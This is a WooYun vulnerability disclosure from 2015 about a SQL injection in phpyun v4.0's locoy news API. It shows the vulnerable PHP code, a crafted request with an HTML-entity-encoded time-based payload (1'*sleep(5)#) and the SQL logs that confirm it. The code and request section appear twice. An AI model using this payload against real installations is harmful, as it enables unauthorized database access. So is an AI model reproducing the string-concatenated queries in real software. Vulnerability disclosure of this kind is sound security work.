当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0144377

漏洞标题:phpyun最新版无视GPC注入(修复错误)

相关厂商:php云人才系统

漏洞作者: Xser

提交时间:2015-10-11 15:11

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-11: 细节已通知厂商并且等待厂商处理中
2015-10-13: 厂商已经确认,细节仅向厂商公开
2015-10-16: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2015-12-07: 细节向核心白帽子及相关领域专家公开
2015-12-17: 细节向普通白帽子公开
2015-12-27: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

PHP云人才系统 phpyun v4.0正式版 build20150819
修复位置修复错了

详细说明:

出现在api/locoy/model/news.class.php

class news_controller extends common{
	function addnews_action(){//新闻添加
		include("locoy_config.php");
		if($locoyinfo['locoy_online']!=1){
			echo 4;die;
		}
		if($locoyinfo['locoy_key']!=trim($_GET['key'])){
			echo 5;die;
		}
        if(!$_POST['title'] || !$_POST['content'] || !$_POST['nid']){
			echo 2;die;
		}
		$row=$this->obj->DB_select_once("news_base","`title`='".trim($_POST['title'])."' and `nid`='".$_POST['nid']."'");
		if(is_array($row)){
			echo 3;die;
		}
		$content=$_POST['content'];
		
		$value="";
        $value.="`title`='".trim($_POST['title'])."',";
		$value.="`nid`='".$_POST['nid']."',";
		$value.="`did`='0',";
		$value.="`author`='".$_POST['author']."',";
		$description=mb_substr(strip_tags(html_entity_decode($content,ENT_NOQUOTES,"GB2312")),0,180,"gbk");
		$description=$_POST['description']?$_POST['description']:$description;
		$description=str_replace(array(' ',"\n","\r","\r\n"," "),array(''),$description);
		$value.="`description`='".$description."',";
		$value.="`source`='".$_POST['source']."'";
		if($_POST['ctime']){
			$value.=",`datetime`='".strtotime($_POST['ctime'])."'";
		}else{
			$value.=",`datetime`='".time()."'";
		}
		if($_POST['hits']){
			$value.=",`hits`='".trim($_POST['hits'])."'";
		}else{
			$row=explode('-',$locoyinfo['locoy_rand']);
			if(is_array($row)){
				$rand=rand(trim($row[0]),trim($row[1]));
			}else{
				$rand=!trim($row)?0:$row;
			}
			$value.=",`hits`='".$rand."'";
		}
		if($_POST['sort']){
			$value.=",`sort`='".trim($_POST['sort'])."'";
		}else{
			$row=explode('-',$locoyinfo['locoy_sort']);
			if(is_array($row)){
				$rand=rand(trim($row[0]),trim($row[1]));
			}else{
				$rand=!trim($row)?0:$row;
			}
			$value.=",`sort`='".$rand."'";
		}
		if($_POST['newsphoto']){
			$value.=",`newsphoto`='".trim($_POST['newsphoto'])."'";
		}
		if($_POST['s_thumb']){
			$value.=",`s_thumb`='".trim($_POST['s_thumb'])."'";
		}
       if(!$_POST['keyword'] && $locoyinfo['locoy_keyword']==1){
			require(LIB_PATH."lib_splitword_class.php");
			$sp = new SplitWord();
			$keywordarr=$sp->getkeyword(strip_tags(html_entity_decode($content)));
			$value.=",`keyword`='".strip_tags(@implode(",",$keywordarr))."'";
		}elseif($_POST['keyword']){
			$value.=",`keyword`='".str_replace(",",",",$_POST['keyword'])."'";
		}
     	$new_base = $this->obj->DB_insert_once("news_base",$value);
        $news_content = $this->obj->DB_insert_once("news_content", "`nbid`='$new_base',`content`='$content'");
		if($new_base){
			echo 1;die;
		}else{
			echo 0;die;	
		}
	}
}
?>


$description=mb_substr(strip_tags(html_entity_decode($content,ENT_NOQUOTES,"GB2312")),0,180,"gbk");
		$description=$_POST['description']?$_POST['description']:$description;
		$description=str_replace(array(' ',"\n","\r","\r\n"," "),array(''),$description);


这里没有修复好
再次测试一下

这样发送url:
http://localhost/phpyun40/upload/api/locoy/index.php?m=news&c=addnews&key=phpyun
postdata:
title=xxxx&content=%26%2349%3B%26%2339%3B%26%2342%3B%26%23115%3B%26%23108%3B%26%23101%3B%26%23101%3B%26%2332%3B%26%23112%3B%26%2340%3B%26%2353%3B%26%2341%3B%26%2335%3B&nid=567&keyword=xxxxxx


QQ截图20151001115219.png


可以看到还是存在的

2015/10/1 11:45	INSERT INTO `phpyun_news_base` SET `title`='xxxx',`nid`='567',`did`='0',`author`='',`description`='1'*sleep(5)#',`source`='',`datetime`='1443671113',`hits`='',`sort`='',`keyword`='xxxxxx'


2015/10/1 11:45	INSERT INTO `phpyun_news_content` SET `nbid`='1',`content`='1'*slee p(5)#'


可这里却被过滤了
我看是开发者修复错位了吧。。。。
导致还是存在注入

漏洞证明:

出现在api/locoy/model/news.class.php

class news_controller extends common{
	function addnews_action(){//新闻添加
		include("locoy_config.php");
		if($locoyinfo['locoy_online']!=1){
			echo 4;die;
		}
		if($locoyinfo['locoy_key']!=trim($_GET['key'])){
			echo 5;die;
		}
        if(!$_POST['title'] || !$_POST['content'] || !$_POST['nid']){
			echo 2;die;
		}
		$row=$this->obj->DB_select_once("news_base","`title`='".trim($_POST['title'])."' and `nid`='".$_POST['nid']."'");
		if(is_array($row)){
			echo 3;die;
		}
		$content=$_POST['content'];
		
		$value="";
        $value.="`title`='".trim($_POST['title'])."',";
		$value.="`nid`='".$_POST['nid']."',";
		$value.="`did`='0',";
		$value.="`author`='".$_POST['author']."',";
		$description=mb_substr(strip_tags(html_entity_decode($content,ENT_NOQUOTES,"GB2312")),0,180,"gbk");
		$description=$_POST['description']?$_POST['description']:$description;
		$description=str_replace(array(' ',"\n","\r","\r\n"," "),array(''),$description);
		$value.="`description`='".$description."',";
		$value.="`source`='".$_POST['source']."'";
		if($_POST['ctime']){
			$value.=",`datetime`='".strtotime($_POST['ctime'])."'";
		}else{
			$value.=",`datetime`='".time()."'";
		}
		if($_POST['hits']){
			$value.=",`hits`='".trim($_POST['hits'])."'";
		}else{
			$row=explode('-',$locoyinfo['locoy_rand']);
			if(is_array($row)){
				$rand=rand(trim($row[0]),trim($row[1]));
			}else{
				$rand=!trim($row)?0:$row;
			}
			$value.=",`hits`='".$rand."'";
		}
		if($_POST['sort']){
			$value.=",`sort`='".trim($_POST['sort'])."'";
		}else{
			$row=explode('-',$locoyinfo['locoy_sort']);
			if(is_array($row)){
				$rand=rand(trim($row[0]),trim($row[1]));
			}else{
				$rand=!trim($row)?0:$row;
			}
			$value.=",`sort`='".$rand."'";
		}
		if($_POST['newsphoto']){
			$value.=",`newsphoto`='".trim($_POST['newsphoto'])."'";
		}
		if($_POST['s_thumb']){
			$value.=",`s_thumb`='".trim($_POST['s_thumb'])."'";
		}
       if(!$_POST['keyword'] && $locoyinfo['locoy_keyword']==1){
			require(LIB_PATH."lib_splitword_class.php");
			$sp = new SplitWord();
			$keywordarr=$sp->getkeyword(strip_tags(html_entity_decode($content)));
			$value.=",`keyword`='".strip_tags(@implode(",",$keywordarr))."'";
		}elseif($_POST['keyword']){
			$value.=",`keyword`='".str_replace(",",",",$_POST['keyword'])."'";
		}
     	$new_base = $this->obj->DB_insert_once("news_base",$value);
        $news_content = $this->obj->DB_insert_once("news_content", "`nbid`='$new_base',`content`='$content'");
		if($new_base){
			echo 1;die;
		}else{
			echo 0;die;	
		}
	}
}
?>


$description=mb_substr(strip_tags(html_entity_decode($content,ENT_NOQUOTES,"GB2312")),0,180,"gbk");
		$description=$_POST['description']?$_POST['description']:$description;
		$description=str_replace(array(' ',"\n","\r","\r\n"," "),array(''),$description);


这里没有修复好
再次测试一下

这样发送url:
http://localhost/phpyun40/upload/api/locoy/index.php?m=news&c=addnews&key=phpyun
postdata:
title=xxxx&content=%26%2349%3B%26%2339%3B%26%2342%3B%26%23115%3B%26%23108%3B%26%23101%3B%26%23101%3B%26%2332%3B%26%23112%3B%26%2340%3B%26%2353%3B%26%2341%3B%26%2335%3B&nid=567&keyword=xxxxxx


QQ截图20151001115219.png


可以看到还是存在的

2015/10/1 11:45	INSERT INTO `phpyun_news_base` SET `title`='xxxx',`nid`='567',`did`='0',`author`='',`description`='1'*sleep(5)#',`source`='',`datetime`='1443671113',`hits`='',`sort`='',`keyword`='xxxxxx'


2015/10/1 11:45	INSERT INTO `phpyun_news_content` SET `nbid`='1',`content`='1'*slee p(5)#'


可这里却被过滤了
我看是开发者修复错位了吧。。。。
导致还是存在注入

修复方案:

版权声明:转载请注明来源 Xser@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-10-13 11:20

厂商回复:

感谢提供!

最新状态:

暂无